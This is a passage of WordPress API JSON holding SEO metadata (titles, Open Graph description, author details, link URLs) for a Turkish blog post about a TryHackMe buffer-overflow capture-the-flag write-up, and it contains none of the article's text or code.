class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\"},\"author\":{\"name\":\"Fatih Soysal\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"headline\":\"TryHackMe Overflow The Jackpot Writeup ve Rehberi\",\"datePublished\":\"2026-08-10T06:07:01+00:00\",\"dateModified\":\"2026-08-10T06:07:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\"},\"wordCount\":2125,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#respond\"]}],\"copyrightYear\":\"2026\",\"copyrightHolder\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#organization\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\",\"name\":\"TryHackMe Overflow The Jackpot Writeup ve Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131\",\"isPartOf\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#website\"},\"datePublished\":\"2026-08-10T06:07:01+00:00\",\"dateModified\":\"2026-08-10T06:07:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Anasayfa\",\"item\":\"https:\/\/fatihsoysal.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TryHackMe Overflow The Jackpot Writeup ve Rehberi\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#website\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/\",\"name\":\"Fatihsoysal.com\",\"description\":\"Blog - Yaz\u0131l\u0131m D\u00fcnyas\u0131 Tecr\u00fcbelerim\",\"publisher\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/fatihsoysal.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\",\"name\":\"Fatih Soysal\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png\",\"contentUrl\":\"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png\",\"width\":512,\"height\":512,\"caption\":\"Fatih Soysal\"},\"logo\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/\"},\"description\":\"Kullan\u0131m ve kodlama m\u00fckemmeliyetini odak alan uygulamalar olu\u015fturma deneyimine sahip, profesyonel olarak 15+ y\u0131l \u00fczeri deneyime sahip bir yaz\u0131l\u0131m m\u00fchendisi.\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/author\/fatihsoysal\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"TryHackMe Overflow The Jackpot Writeup ve Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/","og_locale":"tr_TR","og_type":"article","og_title":"TryHackMe Overflow The Jackpot Writeup ve Rehberi","og_description":"TryHackMe platformunda yer alan Overflow The Jackpot odas\u0131n\u0131n ad\u0131m ad\u0131m \u00e7\u00f6z\u00fcm rehberi ile bellek ta\u015fmas\u0131 (Buffer Overflow) zafiyetlerini derinlemesine ke\u015ffedin ve s\u00f6m\u00fcr\u00fc kodunuzu yaz\u0131n.","og_url":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/","og_site_name":"Kodlar\u0131n Gizemli D\u00fcnyas\u0131","article_published_time":"2026-08-10T06:07:01+00:00","article_modified_time":"2026-08-10T06:07:29+00:00","author":"Fatih Soysal","twitter_card":"summary_large_image","twitter_misc":{"Yazan:":"Fatih Soysal","Tahmini okuma s\u00fcresi":"12 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#article","isPartOf":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/"},"author":{"name":"Fatih Soysal","@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"headline":"TryHackMe Overflow The Jackpot Writeup ve Rehberi","datePublished":"2026-08-10T06:07:01+00:00","dateModified":"2026-08-10T06:07:29+00:00","mainEntityOfPage":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/"},"wordCount":2125,"commentCount":0,"publisher":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"inLanguage":"tr","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#respond"]}],"copyrightYear":"2026","copyrightHolder":{"@id":"https:\/\/fatihsoysal.com\/blog\/#organization"}},{"@type":"WebPage","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/","url":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/","name":"TryHackMe Overflow The Jackpot Writeup ve Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131","isPartOf":{"@id":"https:\/\/fatihsoysal.com\/blog\/#website"},"datePublished":"2026-08-10T06:07:01+00:00","dateModified":"2026-08-10T06:07:29+00:00","breadcrumb":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Anasayfa","item":"https:\/\/fatihsoysal.com\/blog\/"},{"@type":"ListItem","position":2,"name":"TryHackMe Overflow The Jackpot Writeup ve Rehberi"}]},{"@type":"WebSite","@id":"https:\/\/fatihsoysal.com\/blog\/#website","url":"https:\/\/fatihsoysal.com\/blog\/","name":"Fatihsoysal.com","description":"Blog - Yaz\u0131l\u0131m D\u00fcnyas\u0131 Tecr\u00fcbelerim","publisher":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fatihsoysal.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1","name":"Fatih Soysal","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png","contentUrl":"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png","width":512,"height":512,"caption":"Fatih Soysal"},"logo":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/"},"description":"Kullan\u0131m ve kodlama m\u00fckemmeliyetini odak alan uygulamalar olu\u015fturma deneyimine sahip, profesyonel olarak 15+ y\u0131l \u00fczeri deneyime sahip bir yaz\u0131l\u0131m m\u00fchendisi.","url":"https:\/\/fatihsoysal.com\/blog\/author\/fatihsoysal\/"}]}},"yoast_meta":{"yoast_wpseo_title":"","yoast_wpseo_metadesc":"","yoast_wpseo_canonical":""},"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/43972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/comments?post=43972"}],"version-history":[{"count":1,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/43972\/revisions"}],"predecessor-version":[{"id":43973,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/43972\/revisions\/43973"}],"wp:attachment":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/media?parent=43972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/categories?post=43972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/tags?post=43972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}